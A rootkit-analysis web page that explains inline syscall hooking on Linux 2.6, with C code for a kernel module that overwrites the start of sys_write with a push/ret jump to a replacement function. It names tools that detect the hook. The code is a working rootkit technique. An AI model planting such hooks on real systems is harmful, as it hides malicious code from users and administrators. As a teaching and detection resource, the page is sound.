kernelland

Syscall/Kernel function interception

This is a more stealth method of syscall hijacking without having to directly modify the syscall table; instead the first several bytes of the syscall are overwritten with a jump to the new code -- i.e "movl $0x0, %eax; jmp *%eax". Keep in mind the original 7 bytes are saved and copied back into the original syscall so that it may be called within the evil syscall. This type of syscall hijacking cannot be detected by tools like ktraq, however a tool like ElfStat which analyzes the text segment of the running kernel and compares it to vmlinux can detect this method, or Ksid which checks the first several bytes of each syscall for a number of different code sequences.

There really isn't much to explain beyond the above paragraph, thus a code example speaks the most.

In Linux 2.6 sys_call_table is not exported, you can either get its address via kmem or use System.map
We are assuming it resides at c0300000

void **sys_call_table = (unsigned long **)0xc0300000;
int (*SYS_write_)(int, void *, int);

Original code will hold the first 6 bytes of the syscall we intercept


 char original_code[6];
 chat replacement_code[6] = 
        "\x68\x00\x00\x00\x00" /* pushl $0x00000000 */
	"\xc3";                /* ret               */

Here we initialize our syscall hijacking for syscall write, this could be done through kmem but in this case we'll pretend its an LKM

		
 int init_hijack(void)
 {

/* Here we patch our special replacement code with the memory address of our new_function */


 *(unsigned long *)&replacement_code[1] 
	                = (unsigned long)new_function;

/* Next we save the first 6 bytes of the original syscall */


 memcpy(original_code, sys_call_table[__NR_write], 6);

/* Overwrite the first 6 bytes of syscall write with instructions to return to our new function */


 memcpy(sys_call_table[__NR_write], replacement_code, 6);

/* create a function pointer to easily call sys_write later */


  SYS_write_ = (void *)sys_call_table[__NR_write];

  return 0;
 }

Here is our new function that is jumped to (or returned in our case) once sys_write is called


  int new_function(int fd, void *buf, int len)
  {

/* ... evil code here ... */
/* temporarily copy original initial code back into syscall */


  memcpy(sys_call_table[__NR_write], original_code, 6);

/* execute real syscall code */


  SYS_write_(fd, buf, len);

/* overwrite first 6 bytes of sys_write with our hook code again */


  memcpy(sys_call_table[__NR_write], replacement_code, 6);
 }

So that's the general idea behind it -- you can use this method to hijack kernel functions as well, with some obvious modifications (no syscall table). It should be pretty obvious how to detect this type of infection, I've written several tools that see this -- KSiD (Kernel Symbol interception detection) is the latest, it checks the first N bytes of each kernel function and syscall for specific code sequences like jumps and rets.

Blogs

Socialize with RootkitAnalytics

Links

Rootkits & Enterprise: Enterprise is a major victim to rootkits. What could rootkits do to them?[read more]

Rootkits & Home-users: Do home-users know the seriousness of rootkits? What should a home-user know about rootkits?[read more]

Rootkits & Information Warfare: What does the silent war of intelligence and national security, got to do with rootkit analysis?[read more]

Userland Rootkits: What should one know about userland rootkits?[read more]

Spy DLL Remover: Were you looking for a tool to detect userland rootkits in your Windows box?[read more]

Kernelland Rootkits: What should one know about kernelland rootkits?[read more]

ElfStat: ElfStat is a tool designed for detecting any kernel malware that modifies the text segment of the kernel in memory...[read more]

Syscall/Kernel function interception: This is a more stealth method of syscall hijacking without having to directly modify the syscall table; instead the first several bytes of the syscall are overwritten with a jump to the new code...[read more]

Syscall Interception: What should you know about Syscall interception by directly modifying the Syscall table?[read more]

KsiD [Kernel Symbol Interception Detection]: This tool is designed to detect kernel rootkits and kernel malware which hijack syscalls and kernel functions ...[read more]

IDT /dev/kmem rootkit method: This can be done using several methods including overwriting the first several bytes of the syscall with a jump to other code, or modifying the function pointers.[read more]

Hidden Process Detection: Hidden Process Detection [HPD] using Direct NT System Call Implemenation, PIDB (Process ID Bruteforce) method, CSRSS Process Handle Enumeration and other methods...[read more]

Hidden Registry Detection: Reason for Hiding the Registry Entries, Rootkit techniques to hide, and Detecting Hidden Registry Entries Using Direct NT System Call Method and Directly Reading Hives Method...[read more]

Hidden Service Detection: Hidden Rootkit Services Detection Methods...Enumerating Processes with 'NtControlPipe', Hook Bypass Method through Mapped Image, Services Enumerating Child Processes of Services.exe, Enumerating Services Registry Key...[read more]

Syscall Handler Checker [SHC]: This tool simply verifies whether or not the system call handler system_call() has been patched to call a phony sys_call_table. If a phony sys_call_table appears to be in use, a tool like elfstat can be used for further analysis...[read more]

Firmware Rootkits: Firmware is a small static code that runs on devices ranging from consumer electronics to anything that controls heavy machinery...[read more]

Hypervisor Rootkits: This comes under both firmware and hardware rootkits. The reason being, hypervisor is a virtual environment that runs on the hardware, but basically it is a firmware. Hence, we have drawn the line and dropped this rootkit in the firmware category of rootkits...[read more]

Publications: In this section, we are planning to list all the papers that we have published so far that are rootkit related.

Backdoor Ultimate Defender: In this paper (Backdoor.Win32.UltimateDefender.gtz - Reversing) we analyze install.exe that presents the typical structure of an Medium Evoluted Malware, with basical Obfuscated-Dummy Code...[read more]

Socialize: You could socialize with us by many ways...[read more]

About: Learn about rootkit analytics here...[read more]

Contact us: How can you reach us...[read more]

Our Team: Read more about the rootkit analytics team...[read more]

dwtf v1.0 dwtf is a DLL copying engine ... [read more]

Number of Installations

Spy DLL Remover32264
Elfstat1054
KsiD670
SHC504
dwtf415

Socialize with EvilFingers

Tweets

@EvilFingers yep. on 3. March 2010 19:15:10 CET :)

@EvilFingers np :) could it be that my mail from yesterday is lying in the spam folder again? :)

RT @EvilFingers: Signature Analytics Blog: Detecting Malware infections with Snort DNS Monitoring - http://bit.ly/8ZiI5o #zataz

@EvilFingers NP its also interesting to see various ways of detecting malware, another thing to add to my ToDo list.

RT @sucuri_security: RT @EvilFingers: Signature Analytics Blog: Detecting Malware infections with Snort DNS Monitoring - http://sign.kaffenews.com/?p=104

RT @EvilFingers: Signature Analytics Blog: Detecting Malware infections with Snort DNS Monitoring - http://sign.kaffenews.com/?p=104

RT @EvilFingers: Signature Analytics Blog:Detecting Malware infections with Snort DNS Monitoring - http://sign.kaffenews.com/?p=104

RT @EvilFingers: I am trying to find some really good vbulletin skins/themes/templates, paid & free versions. contact.fingers@gmail.com

@EvilFingers I'm more than a little biased, but I say neither. Both are expensive, have far more features than I need, and are heavy srvr.

@EvilFingers I look short in this way on google. http://bit.ly/9XrPeG

www.spywareanalytics.com has just been released in the wild. Thanks for the service @EvilFingers

@EvilFingers SpywareAnalytics.com looks good...nice job!